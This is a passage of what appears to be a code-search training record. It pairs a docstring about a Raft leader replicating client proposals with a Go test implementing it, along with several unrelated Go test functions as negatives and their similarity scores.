\"Expecting NumReconnectsAborted > 0\")\n\t\t\t\t\t}\n\n\t\t\t\t\tassert.NoError(t, ar.Stop())\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t}\n}", "func TestUnevenNodesInZones(t *testing.T) {\n\tt.Parallel()\n\ttestCases := []struct {\n\t\tdescription string\n\t\tnodesMap map[string][]*v1.Node\n\t\tsvcKey string\n\t\tsubsetLimit int\n\t\texpectedCount int\n\t\t// expectEmpty indicates that some zones can have empty subsets\n\t\texpectEmpty bool\n\t}{\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(250), some zones have only a couple of nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone3\": makeNodes(7, 10),\n\t\t\t\t\"zone4\": makeNodes(17, 250),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\texpectedCount: maxSubsetSizeLocal,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(250), 3 zones, some zones have only a couple of nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone4\": makeNodes(7, 250),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\texpectedCount: maxSubsetSizeLocal,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(250), all zones have 100 nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 100),\n\t\t\t\t\"zone2\": makeNodes(100, 100),\n\t\t\t\t\"zone3\": makeNodes(200, 100),\n\t\t\t\t\"zone4\": makeNodes(300, 100),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\texpectedCount: maxSubsetSizeLocal,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(250), 3 zones, all zones have 100 nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 100),\n\t\t\t\t\"zone2\": makeNodes(100, 100),\n\t\t\t\t\"zone3\": makeNodes(200, 100),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\texpectedCount: maxSubsetSizeLocal,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes < limit(250), some have only a couple of nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone3\": makeNodes(7, 10),\n\t\t\t\t\"zone4\": makeNodes(17, 33),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\t// All the nodes should be picked\n\t\t\texpectedCount: 49,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes < limit(250), all have only a couple of nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone3\": makeNodes(7, 3),\n\t\t\t\t\"zone4\": makeNodes(10, 4),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeLocal,\n\t\t\t// All the nodes should be picked\n\t\t\texpectedCount: 13,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(25), some zones have only a couple of nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone3\": makeNodes(7, 10),\n\t\t\t\t\"zone4\": makeNodes(17, 250),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeDefault,\n\t\t\texpectedCount: maxSubsetSizeDefault,\n\t\t},\n\t\t{\n\t\t\tdescription: \"Total number of nodes > limit(25), one zone has no nodes.\",\n\t\t\tnodesMap: map[string][]*v1.Node{\n\t\t\t\t\"zone1\": makeNodes(1, 1),\n\t\t\t\t\"zone2\": makeNodes(2, 5),\n\t\t\t\t\"zone3\": nil,\n\t\t\t\t\"zone4\": makeNodes(17, 250),\n\t\t\t},\n\t\t\tsvcKey: \"svc123\",\n\t\t\tsubsetLimit: maxSubsetSizeDefault,\n\t\t\texpectedCount: maxSubsetSizeDefault,\n\t\t\texpectEmpty: true,\n\t\t},\n\t}\n\tfor _, tc := range testCases {\n\t\tsubsetMap, err := getSubsetPerZone(tc.nodesMap, tc.subsetLimit, tc.svcKey, nil, klog.TODO(), &network.NetworkInfo{})\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Failed to get subset for test '%s', err %v\", tc.description, err)\n\t\t}\n\t\tif len(subsetMap) != len(tc.nodesMap) {\n\t\t\tt.Errorf(\"Not all input zones were included in the subset. subset map - %v, nodesMap %v, test '%s'\",\n\t\t\t\tsubsetMap, tc.nodesMap, tc.description)\n\t\t}\n\t\ttotalSubsetSize := 0\n\t\tfor zone, subset := range subsetMap {\n\t\t\tif subset.Len() == 0 && !tc.expectEmpty {\n\t\t\t\tt.Errorf(\"Got empty subset in zone %s for test '%s'\", zone, tc.description)\n\t\t\t}\n\t\t\ttotalSubsetSize += subset.Len()\n\t\t}\n\t\tif totalSubsetSize != tc.expectedCount {\n\t\t\tt.Errorf(\"Expected %d nodes in subset, Got %d for test '%s'\", maxSubsetSizeLocal, totalSubsetSize,\n\t\t\t\ttc.description)\n\t\t}\n\t}\n}", "func (suite *KeeperTestSuite) TestOnTimeoutPacket() {\n\tdata := types.NewFungibleTokenPacketData(prefixCoins2, testAddr1.String(), testAddr2.String())\n\ttestCoins2 := sdk.NewCoins(sdk.NewCoin(\"bank/firstchannel/atom\", sdk.NewInt(100)))\n\n\ttestCases := []struct {\n\t\tmsg string\n\t\tmalleate func()\n\t\tsource bool\n\t\texpPass bool\n\t}{\n\t\t{\"successful timeout from source chain\",\n\t\t\tfunc() {\n\t\t\t\tescrow := types.GetEscrowAddress(testPort1, testChannel1)\n\t\t\t\t_, err := suite.chainA.App.BankKeeper.AddCoins(suite.chainA.GetContext(), escrow, sdk.NewCoins(sdk.NewCoin(\"atom\", sdk.NewInt(100))))\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}, true, true},\n\t\t{\"successful timeout from external chain\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount = testCoins2\n\t\t\t}, false, true},\n\t\t{\"no source prefix on coin denom\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount = prefixCoins2\n\t\t\t}, false, false},\n\t\t{\"unescrow failed\",\n\t\t\tfunc() {\n\t\t\t}, true, false},\n\t\t{\"mint failed\",\n\t\t\tfunc() {\n\t\t\t\tdata.Amount[0].Denom = prefixCoins2[0].Denom\n\t\t\t\tdata.Amount[0].Amount = sdk.ZeroInt()\n\t\t\t}, true, false},\n\t}\n\n\tpacket := channeltypes.NewPacket(data.GetBytes(), 1, testPort1, testChannel1, testPort2, testChannel2, 100, 0)\n\n\tfor i, tc := range testCases {\n\t\ttc := tc\n\t\ti := i\n\t\tsuite.Run(fmt.Sprintf(\"Case %s\", tc.msg), func() {\n\t\t\tsuite.SetupTest() // reset\n\n\t\t\ttc.malleate()\n\n\t\t\tvar denom string\n\t\t\tif tc.source {\n\t\t\t\tprefix := types.GetDenomPrefix(packet.GetDestPort(), packet.GetDestChannel())\n\t\t\t\tdenom = prefixCoins2[0].Denom[len(prefix):]\n\t\t\t} else {\n\t\t\t\tdenom = data.Amount[0].Denom\n\t\t\t}\n\n\t\t\tpreCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\n\t\t\terr := suite.chainA.App.TransferKeeper.OnTimeoutPacket(suite.chainA.GetContext(), packet, data)\n\n\t\t\tpostCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\t\t\tdeltaAmount := postCoin.Amount.Sub(preCoin.Amount)\n\n\t\t\tif tc.expPass {\n\t\t\t\tsuite.Require().NoError(err, \"valid test case %d failed: %s\", i, tc.msg)\n\t\t\t\tsuite.Require().Equal(prefixCoins2[0].Amount.Int64(), deltaAmount.Int64(), \"successful timeout did not trigger refund\")\n\t\t\t} else {\n\t\t\t\tsuite.Require().Error(err, \"invalid test case %d passed: %s\", i, tc.msg)\n\t\t\t}\n\t\t})\n\t}\n}", "func TestFindOffsetIntervalNoMajorityOverlap(t *testing.T) {\n\t// Build the offsets. We will return the interval that the maximum number\n\t// of remote clocks overlap.\n\toffsets := make(map[string]RemoteOffset)\n\toffsets[\"0\"] = RemoteOffset{Offset: 0, Error: 1}\n\toffsets[\"1\"] = RemoteOffset{Offset: 1, Error: 1}\n\toffsets[\"2\"] = RemoteOffset{Offset: 3, Error: 1}\n\toffsets[\"3\"] = RemoteOffset{Offset: 4, Error: 1}\n\n\tmanual := hlc.ManualClock(0)\n\tclock := hlc.NewClock(manual.UnixNano)\n\tclock.SetMaxOffset(0 * time.Nanosecond)\n\tremoteClocks := &RemoteClockMonitor{\n\t\toffsets: offsets,\n\t\tlClock: clock,\n\t}\n\tassertMajorityIntervalError(remoteClocks, t)\n}", "func TestLeasePreferencesRebalance(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\n\tctx := context.Background()\n\tsettings := cluster.MakeTestingClusterSettings()\n\tsv := &settings.SV\n\t// set min lease transfer high, so we know it does affect the lease movement.\n\tkvserver.MinLeaseTransferInterval.Override(sv, 24*time.Hour)\n\t// Place all the leases in us-west.\n\tzcfg := zonepb.DefaultZoneConfig()\n\tzcfg.LeasePreferences = []zonepb.LeasePreference{\n\t\t{\n\t\t\tConstraints: []zonepb.Constraint{\n\t\t\t\t{Type: zonepb.Constraint_REQUIRED, Key: \"region\", Value: \"us-west\"},\n\t\t\t},\n\t\t},\n\t}\n\tnumNodes := 3\n\tserverArgs := make(map[int]base.TestServerArgs)\n\tlocality := func(region string) roachpb.Locality {\n\t\treturn roachpb.Locality{\n\t\t\tTiers: []roachpb.Tier{\n\t\t\t\t{Key: \"region\", Value: region},\n\t\t\t},\n\t\t}\n\t}\n\tlocalities := []roachpb.Locality{\n\t\tlocality(\"us-west\"),\n\t\tlocality(\"us-east\"),\n\t\tlocality(\"eu\"),\n\t}\n\tfor i := 0; i < numNodes; i++ {\n\t\tserverArgs[i] = base.TestServerArgs{\n\t\t\tLocality: localities[i],\n\t\t\tKnobs: base.TestingKnobs{\n\t\t\t\tServer: &server.TestingKnobs{\n\t\t\t\t\tDefaultZoneConfigOverride: &zcfg,\n\t\t\t\t},\n\t\t\t},\n\t\t\tSettings: settings,\n\t\t}\n\t}\n\ttc := testcluster.StartTestCluster(t, numNodes,\n\t\tbase.TestClusterArgs{\n\t\t\tReplicationMode: base.ReplicationManual,\n\t\t\tServerArgsPerNode: serverArgs,\n\t\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tkey := keys.UserTableDataMin\n\ttc.SplitRangeOrFatal(t, key)\n\ttc.AddVotersOrFatal(t, key, tc.Targets(1, 2)...)\n\trequire.NoError(t, tc.WaitForVoters(key, tc.Targets(1, 2)...))\n\tdesc := tc.LookupRangeOrFatal(t, key)\n\tleaseHolder, err := tc.FindRangeLeaseHolder(desc, nil)\n\trequire.NoError(t, err)\n\trequire.Equal(t, tc.Target(0), leaseHolder)\n\n\t// Manually move lease out of preference.\n\ttc.TransferRangeLeaseOrFatal(t, desc, tc.Target(1))\n\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(1)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(1), lh)\n\t\t}\n\t\treturn nil\n\t})\n\n\ttc.GetFirstStoreFromServer(t, 1).SetReplicateQueueActive(true)\n\trequire.NoError(t, tc.GetFirstStoreFromServer(t, 1).ForceReplicationScanAndProcess())\n\n\t// The lease should be moved back by the rebalance queue to us-west.\n\ttestutils.SucceedsSoon(t, func() error {\n\t\tlh, err := tc.FindRangeLeaseHolder(desc, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !lh.Equal(tc.Target(0)) {\n\t\t\treturn errors.Errorf(\"Expected leaseholder to be %s but was %s\", tc.Target(0), lh)\n\t\t}\n\t\treturn nil\n\t})\n}", "func TestAddNodeCheckQuorum(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.pendingConf = true\n\tr.checkQuorum = true\n\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\tfor i := 0; i < r.electionTimeout-1; i++ {\n\t\tr.tick()\n\t}\n\tgrp := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tr.addNode(2, grp)\n\n\t// This tick will reach electionTimeout, which triggers a quorum check.\n\tr.tick()\n\n\t// Node 1 should still be the leader after a single tick.\n\tif r.state != StateLeader {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateLeader)\n\t}\n\n\t// After another electionTimeout ticks without hearing from node 2,\n\t// node 1 should step down.\n\tfor i := 0; i < r.electionTimeout; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateFollower)\n\t}\n}", "func (c *DNSProvider) Timeout() (timeout, interval time.Duration) {\n\treturn 120 * time.Second, 2 * time.Second\n}", "func TestIdleConns(t *testing.T) {\n\tr := rand.New(rand.NewSource(time.Now().UnixNano()))\n\tif !hasArg(\"idle\") {\n\t\tt.Skip()\n\t}\n\n\tdoc := func(l int) []byte {\n\t\tb := make([]byte, l)\n\t\tn, err := r.Read(b)\n\t\tif err != nil || n != l {\n\t\t\tt.Fatal(\"failed to generate doc\", err, n, l)\n\t\t}\n\n\t\treturn b\n\t}\n\n\tserver := func(doc []byte) *httptest.Server {\n\t\treturn httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {\n\t\t\tw.Write(doc)\n\t\t}))\n\t}\n\n\td0 := doc(128)\n\ts0 := server(d0)\n\tdefer s0.Close()\n\n\td1 := doc(256)\n\ts1 := server(d1)\n\tdefer s1.Close()\n\n\tconst (\n\t\tclosePeriod = 100 * time.Millisecond\n\t\tconcurrentRequests = 10\n\t)\n\n\tfor _, ti := range []struct {\n\t\tmsg string\n\t\tidleConns int\n\t\tcloseIdleConns time.Duration\n\t}{{\n\t\t\"negative idle (default), negative close (none)\",\n\t\t-1,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"zero idle (default), negative close (none)\",\n\t\t0,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"small idle, negative close (none)\",\n\t\t3,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"large idle, negative close (none)\",\n\t\t256,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"negative idle (default), zero close (default)\",\n\t\t-1,\n\t\t0,\n\t}, {\n\t\t\"zero idle (default), zero close (default)\",\n\t\t0,\n\t\t0,\n\t}, {\n\t\t\"small idle, zero close (default)\",\n\t\t3,\n\t\t0,\n\t}, {\n\t\t\"large idle, zero close (default)\",\n\t\t256,\n\t\t0,\n\t}, {\n\t\t\"negative idle (default), close\",\n\t\t-1,\n\t\tclosePeriod,\n\t}, {\n\t\t\"zero idle (default), close\",\n\t\t0,\n\t\tclosePeriod,\n\t}, {\n\t\t\"small idle, close\",\n\t\t3,\n\t\tclosePeriod,\n\t}, {\n\t\t\"large idle, close\",\n\t\t256,\n\t\tclosePeriod,\n\t}} {\n\t\tp := proxytest.WithParams(nil,\n\t\t\tproxy.Params{\n\t\t\t\tIdleConnectionsPerHost: ti.idleConns,\n\t\t\t\tCloseIdleConnsPeriod: ti.closeIdleConns},\n\t\t\t&eskip.Route{Id: \"s0\", Path: \"/s0\", Backend: s0.URL},\n\t\t\t&eskip.Route{Id: \"s1\", Path: \"/s1\", Backend: s1.URL})\n\t\tdefer p.Close()\n\n\t\trequest := func(path string, doc []byte) {\n\t\t\treq, err := http.NewRequest(\"GET\", p.URL+path, nil)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to create request\", err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\treq.Close = true\n\n\t\t\trsp, err := (&http.Client{}).Do(req)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to make request\", err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tdefer rsp.Body.Close()\n\t\t\tb, err := io.ReadAll(rsp.Body)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to read response\", err)\n\t\t\t}\n\n\t\t\tif !bytes.Equal(b, doc) {\n\t\t\t\tt.Fatal(ti.msg, \"failed to read response, invalid content\", len(b), len(doc))\n\t\t\t}\n\t\t}\n\n\t\tstop := make(chan struct{})\n\t\twg := sync.WaitGroup{}\n\n\t\trunRequests := func(path string, doc []byte) {\n\t\t\twg.Add(1)\n\t\t\tdefer wg.Done()\n\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-stop:\n\t\t\t\t\treturn\n\t\t\t\tdefault:\n\t\t\t\t\trequest(path, doc)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfor i := 0; i < concurrentRequests; i++ {\n\t\t\tgo runRequests(\"/s0\", d0)\n\t\t\tgo runRequests(\"/s1\", d1)\n\t\t}\n\n\t\t<-time.After(10 * closePeriod)\n\t\tclose(stop)\n\t\twg.Wait()\n\t}\n}", "func TestNodeTick(t *testing.T) {\n\tn := newTestNode(1, []uint64{2, 3}, 0)\n\tr := n.raft\n\tgo n.run()\n\telapsed := r.electionElapsed\n\tn.Tick()\n\n\tfor len(n.tickc) != 0 {\n\t\ttime.Sleep(100 * time.Millisecond)\n\t}\n\n\tn.Stop()\n\tif r.electionElapsed != elapsed+1 {\n\t\tt.Errorf(\"elapsed = %d, want %d\", r.electionElapsed, elapsed+1)\n\t}\n}", "func validateNtpOnCluster(ntpObj ntpTest) {\n\tBy(fmt.Sprintf(\"ts:%s Validating Cluster\", time.Now().String()))\n\n\tBy(fmt.Sprintf(\"Validates NTP config file on Quorum Nodes\"))\n\tfor _, qnode := range ts.tu.QuorumNodes {\n\t\tip := ts.tu.NameToIPMap[qnode]\n\t\tif ip == ntpObj.oldLeaderIP {\n\t\t\tcontinue // skip validation as cmd is paused on that node\n\t\t}\n\t\tvar ntpServers []string\n\t\tif ip == ntpObj.ntpLeaderIP {\n\t\t\tntpServers = ntpObj.externalNtpServers\n\t\t} else {\n\t\t\tntpServers = []string{ntpObj.ntpLeaderIP}\n\t\t}\n\n\t\tEventually(func() bool {\n\t\t\tntpConf := ts.tu.CommandOutput(ip, \"bash -c 'if [ -f /etc/pensando/pen-ntp/chrony.conf ] ; then cat /etc/pensando/pen-ntp/chrony.conf; fi' \")\n\t\t\tif strings.Count(ntpConf, \"server \") == len(ntpServers) {\n\t\t\t\tfor _, ntpServer := range ntpServers {\n\t\t\t\t\tif strings.Index(ntpConf, \"server \"+ntpServer+\" iburst\") == -1 {\n\t\t\t\t\t\tBy(fmt.Sprintf(\"%v not present in config. found %v\", ntpServer, ntpConf))\n\t\t\t\t\t\treturn false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tBy(fmt.Sprintf(\"ntpserver: %v ntpconf: %v\", ntpServers, ntpConf))\n\t\t\treturn false\n\t\t}, 75, 5).Should(BeTrue(), \"NTP servers for %v quorum node should be %v\", qnode, ntpServers)\n\t}\n}", "func TestSplitCloneV2_Online_TabletsUnavailableDuringRestart(t *testing.T) {\n\tdelay := discovery.GetTabletPickerRetryDelay()\n\tdefer func() {\n\t\tdiscovery.SetTabletPickerRetryDelay(delay)\n\t}()\n\tdiscovery.SetTabletPickerRetryDelay(5 * time.Millisecond)\n\n\ttc := &splitCloneTestCase{t: t}\n\ttc.setUpWithConcurrency(false /* v3 */, 1, 10, splitCloneTestRowsCount)\n\tdefer tc.tearDown()\n\n\t// In the online phase we won't enable filtered replication. Don't expect it.\n\ttc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(4)\n\ttc.rightMasterFakeDb.DeleteAllEntriesAfterIndex(4)\n\t// The last row will never make it. Don't expect it.\n\ttc.rightMasterFakeDb.DeleteAllEntriesAfterIndex(3)\n\n\t// Ensure that this test uses only the first tablet initially.\n\ttc.sourceRdonlyQs[1].AddHealthResponseWithNotServing()\n\n\t// Let the first tablet fail at the last row.\n\ttc.sourceRdonlyQs[0].errorStreamAtRow(199, 12345667890 /* infinite */)\n\ttc.sourceRdonlyQs[0].setErrorCallback(func() {\n\t\t// Make the second tablet unavailable as well. vtworker should keep retrying\n\t\t// and fail eventually because no tablet is there.\n\t\ttc.sourceRdonlyQs[0].AddHealthResponseWithNotServing()\n\t})\n\n\t// Let vtworker keep retrying and give up rather quickly because the test\n\t// will be blocked until it finally fails.\n\t*retryDuration = 500 * time.Millisecond\n\n\t// Run the vtworker command.\n\targs := []string{\"SplitClone\",\n\t\t\"-offline=false\",\n\t\t// We require only 1 instead of the default 2 replicas.\n\t\t\"--min_healthy_rdonly_tablets\", \"1\"}\n\targs = append(args, tc.defaultWorkerArgs[2:]...)\n\tif err := runCommand(t, tc.wi, tc.wi.wr, args); err == nil || !strings.Contains(err.Error(), \"failed to restart the streaming connection\") {\n\t\tt.Fatalf(\"worker should have failed because all tablets became unavailable and it gave up retrying. err: %v\", err)\n\t}\n\n\tfirst := tc.sourceRdonlyQs[0].alias\n\t// Note that we can track only 2 errors for the first tablet because it\n\t// becomes unavailable after that.\n\tif got, want := statsStreamingQueryErrorsCounters.Counts()[first], int64(2); got < want {\n\t\tt.Errorf(\"wrong number of errored streaming query for tablet: %v: got = %v, want >= %v\", first, got, want)\n\t}\n\tif got, want := statsStreamingQueryCounters.Counts()[first], int64(1); got != want {\n\t\tt.Errorf(\"wrong number of streaming query starts for tablet: %v: got = %v, want = %v\", first, got, want)\n\t}\n}", "func TestClusterLateJoin(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"skipping cluster test in short mode.\")\n\t}\n\tt.Parallel()\n\n\ttc := newTestCluster(t)\n\tdefer tc.tearDown()\n\n\ttc.addSequinses(3)\n\ttc.expectProgression(down, noVersion, v3)\n\n\ttc.makeVersionAvailable(v3)\n\ttc.setup()\n\ttc.startTest()\n\ttime.Sleep(expectTimeout)\n\n\ts := tc.addSequins()\n\ts.makeVersionAvailable(v3)\n\ts.setup()\n\ts.expectProgression(down, v3)\n\ts.startTest()\n\n\ttc.assertProgression()\n}", "func TestLearnerPromotion(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tnt := newNetwork(n1, n2)\n\n\tif n1.state == StateLeader {\n\t\tt.Error(\"peer 1 state is leader, want not\", n1.state)\n\t}\n\n\t// n1 should become leader\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tgrp2 := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tn1.addNode(2, grp2)\n\tn2.addNode(2, grp2)\n\tif n2.isLearner {\n\t\tt.Error(\"peer 2 is learner, want not\")\n\t}\n\n\t// n2 start election, should become leader\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\n\tif n1.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateFollower)\n\t}\n\tif n2.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateLeader)\n\t}\n}", "func TestReductionTimeout(t *testing.T) {\n\teb, _, streamer, _, _ := launchReductionTest(true, 2)\n\n\t// send a hash to start reduction\n\thash, _ := crypto.RandEntropy(32)\n\n\t// Because round updates are asynchronous (sent through a channel), we wait\n\t// for a bit to let the broker update its round.\n\ttime.Sleep(200 * time.Millisecond)\n\tsendSelection(1, hash, eb)\n\n\ttimer := time.After(1 * time.Second)\n\t<-timer\n\n\tstopChan := make(chan struct{})\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tseenTopics := streamer.SeenTopics()\n\t\tfor _, topic := range seenTopics {\n\t\t\tif topic == topics.Agreement {\n\t\t\t\tt.Fatal(\"\")\n\t\t\t}\n\t\t}\n\n\t\tstopChan <- struct{}{}\n\t})\n\n\t<-stopChan\n}", "func (e *ErrWaitServiceStableTimeout) Timeout() bool {\n\treturn true\n}" ]
[ "0.75048506", "0.74821985", "0.67603856", "0.6744892", "0.64194924", "0.6378772", "0.62738466", "0.6143999", "0.61402524", "0.61349475", "0.6042316", "0.59706557", "0.5956589", "0.5952429", "0.59391177", "0.59348154", "0.5842057", "0.58403885", "0.58317566", "0.5827153", "0.58101976", "0.58035666", "0.57974106", "0.5770128", "0.57613194", "0.57393664", "0.56297076", "0.5626006", "0.56191397", "0.5614303", "0.5605516", "0.55799335", "0.5575072", "0.55571955", "0.5550379", "0.55370617", "0.55343544", "0.5524321", "0.55220234", "0.55212086", "0.5497041", "0.5476897", "0.54654455", "0.54514515", "0.5412109", "0.5410157", "0.54094964", "0.54028594", "0.5396134", "0.5393441", "0.53871983", "0.53860956", "0.53827375", "0.5382082", "0.5370372", "0.531491", "0.53071415", "0.5280542", "0.52760416", "0.52696127", "0.5267064", "0.5265813", "0.52653664", "0.5253901", "0.524795", "0.52452254", "0.52441937", "0.5240033", "0.52371675", "0.52309054", "0.5230781", "0.52296513", "0.5225044", "0.5216717", "0.5208817", "0.52083457", "0.51968175", "0.5196725", "0.5193454", "0.51923996", "0.5182257", "0.5178671", "0.51777786", "0.51763105", "0.5175765", "0.5172905", "0.5167039", "0.5163052", "0.51606005", "0.5151695", "0.5146416", "0.5133544", "0.5128039", "0.511526", "0.51146764", "0.5114356", "0.51136005", "0.51126695", "0.51094526", "0.5105422" ]
0.81604284
0
TestLeaderStartReplication tests that when receiving client proposals, the leader appends the proposal to its log as a new entry, then issues AppendEntries RPCs in parallel to each of the other servers to replicate the entry. Also, when sending an AppendEntries RPC, the leader includes the index and term of the entry in its log that immediately precedes the new entries. Also, it writes the new entry into stable storage. Reference: section 5.3
func TestLeaderStartReplication(t *testing.T) { s := NewMemoryStorage() r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s) defer closeAndFreeRaft(r) r.becomeCandidate() r.becomeLeader() commitNoopEntry(r, s) li := r.raftLog.lastIndex() ents := []pb.Entry{{Data: []byte("some data")}} r.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents}) if g := r.raftLog.lastIndex(); g != li+1 { t.Errorf("lastIndex = %d, want %d", g, li+1) } if g := r.raftLog.committed; g != li { t.Errorf("committed = %d, want %d", g, li) } msgs := r.readMessages() sort.Sort(messageSlice(msgs)) wents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte("some data")}} wmsgs := []pb.Message{ {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li}, {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li}, } if !reflect.DeepEqual(msgs, wmsgs) { t.Errorf("msgs = %+v, want %+v", msgs, wmsgs) } if g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) { t.Errorf("ents = %+v, want %+v", g, wents) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
